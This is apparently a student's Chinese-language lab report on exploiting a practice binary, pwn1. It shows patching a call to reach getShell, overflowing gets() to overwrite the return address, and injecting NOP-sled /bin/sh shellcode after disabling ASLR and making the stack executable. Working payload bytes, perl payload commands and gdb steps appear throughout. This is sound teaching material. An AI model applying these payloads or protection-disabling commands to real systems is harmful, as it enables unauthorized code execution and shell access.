本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另外一个代码片断,getShell,会返回一个可用Shell。正常状况下这个代码是不会被运行的。咱们实践的目标就是想办法运行这个代码片断。咱们将学习两种方法运行这个代码片断,而后学习如何注入运行任何Shellcode。html
管道(|):管道是Linux由Unix那里继承过来的进程间的通讯机制,它是Unix早期的一个重要通讯机制。其思想是,在内存中建立一个共享文件,从而使通讯双方利用这个共享文件来传递信息。因为这种方式具备单向传递数据的特色,因此这个做为传递消息的共享文件就叫作“管道”。
管道的局限性:
① 数据本身读不能本身写。
② 数据一旦被读走,便不在管道中存在,不可反复读取。
③ 因为管道采用半双工通讯方式。所以,数据只能在一个方向上流动。
④ 只能在有公共祖先的进程间使用管道。linux
输入:linux标准输入设备指的是键盘,标准输出设备指的是显示器,标准错误输出指的是显示器。
shell
输出重定向(>):输出重定向就是指不使用linux默认的标准输出设备显示信息,而是指定某个文件作为标准输出设备来存储文件信息。vim
Linux下进程地址空间的布局
典型的堆栈结构
栈中有return address还有局部变量,也就是函数的参数,bof攻击是利用上参数的溢出将返回地址return address用本身构造的数据覆盖掉,从而控制程序的进程。接下来就试着经过bof攻击来实现调用getshell函数。windows
下载目标文件pwn1到实验虚拟机,反汇编objdump -d pwn1 |more
。下面只保留了最核心的几行代码。
指令将调用位于地址8048491处的foo函数
其对应机器指令为“e8 d7ffffff”,e8即跳转。
此时此刻EIP的值应该是下条指令的地址,即80484ba,但出现e8这条指令,CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。“d7ffffff”是补码,表示-41,41=0x29,80484ba +d7ffffff= 80484ba-0x29正好是8048491这个值,调用getShell,只要修改“d7ffffff”为,"getShell-80484ba"对应的补码就行。直接 804847d-80484ba就能获得补码,是c3ffffff。sass
因此编辑pwn1文件 vim pwn1
将其中的call指令的目标地址由d7ffffff变为c3ffffff安全
如下操做是在vi内dom
- 按ESC键
- 输入以下,将显示模式切换为16进制模式
:%!xxd- 查找要修改的内容
/e8d7- 找到后先后的内容和反汇编的对比下,确认是地方是正确的
- 修改d7为c3
- 转换16进制为原格式
:%!xxd -r- 存盘退出vi
:wq
./pwn1
运行
咱们从新命名一个原pwn文件pwn1_2
svg
该可执行文件正常运行是调用函数foo,这个函数有Buffer overflow漏洞,即foo函数中的gets函数,因为该函数不会检查用户输入的长度,经过“栈溢出”覆盖栈中保存的RET地址,能够改变程序的执行流。
函数foo中的mov(804849a)读入字符串,但系统只预留了32字节的缓冲区,超出部分会形成溢出,咱们的目标是覆盖返回地址
函数main中的call调用函数foo,同时在堆栈上压上返回地址值:80484ae函数
若是输入字符串1111111122222222333333334444444412345678
,那 1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为getShell的内存地址,输入给pwn1,pwn1就会运行getShell
getShell的内存地址,经过反汇编时能够看到,即0804847d
接下来要确认下字节序,由于PC属于小端因此输入11111111222222223333333344444444\x7d\x84\x04\x08
因为无法经过键盘输入\x7d\x84\x04\x08这样的16进制值,因此须要使用prel方法先生成包括这样字符串的一个文件,将getshell的内存地址写入输入字符串中,\x0a表示回车,若是没有的话,在程序运行时就须要手工按一下回车键。
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
将input的输入,经过管道符“|”,做为pwn1的输入
(cat input; cat) | ./pwn1_2
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\
apt-get install execstack //安装execstack命令
execstack -s pwn1_3 //设置堆栈可执行
execstack -q pwn1_3 //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space //查询是否关闭地址随机化
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space //查询是否关闭地址随机化
Linux下有两种基本构造攻击buf的方法:
咱们这个buf够放这个shellcode了
结构为:nops+shellcode+retaddr
nop一为是了填充,二是做为“着陆区/滑行区”。
咱们猜的返回地址只要落在任何一个nop上,天然会滑到咱们的shellcode。
使用命令注入,其中前面32个A用来填满缓冲区buf,\x04\x03\x02\x01
为预留的返回地址retaddr:
perl -e 'print "A" x 32;print "\x04\x03\x02\x01\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
打开一个终端注入这段攻击buf:
(cat input_shellcode;cat) | ./pwn1_3
开启另外一终端调试进程
用ps -ef | grep pwn1_3
命令找到pwn1_3的进程号是:3937
用gdb pwn1_三、attach命令启动gdb调试这个进程:
用disassemble foo
命令反汇编,经过设置断点,来查看注入buf的内存地址:
经过break *0x080484ae
命令设置断点,输入countine 继续运行
在另一个终端中按下回车使上一调试过程继续执行。再返回调试终端,使用info r esp
命令查找地址:
用x/16x 0xffffd64c
命令查看其存放内容,看到了0x01020304
,就是返回地址的位置。根据咱们构造的input_shellcode可知,shellcode就在其后,因此地址应为0xffffd650
:
接下来只须要将以前的\x4\x3\x2\x1改成这个地址便可,用命令
perl -e 'print "A" x 32;print "\x50\xd6\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
一、提示段错误
二、echo "0" > /proc/sys/kernel/randomize_va_space//关闭地址随机化
提示权限不够。
sudo su
root管理员还怕权限不够。复习了linux虚拟机的操做和gdb调试,Kali和Ubuntu感受最大的不一样就是Ubuntu系统预设了Ctrl+Alt+T
的快捷打开终端而Kali没有,致使实验须要打开另外一个终端时按了好久觉得电脑卡了(同配置下Kali也的确比Ubuntu要卡),后来搜了一下教程在快捷键里添加了命令。
实验上以为汇编代码真的很神奇,但是我汇编学得很差,可是在操做教程的指点下仍是完成了,但愿之后的实验能够钻研出一点有趣的玩法。
漏洞就是现代电子设备在硬件、软件、协议上的一些可以引起一系列安全问题,威胁用户操做的缺陷。好比此次实验的漏洞是缓冲区溢出,由于没有考虑到超出栈的空间分配的问题致使被利用,使软件的功能被改变。攻击者能够对文件进行任意的操做,也可能会执行相关的恶意代码,为木马植入、后门设置提供条件。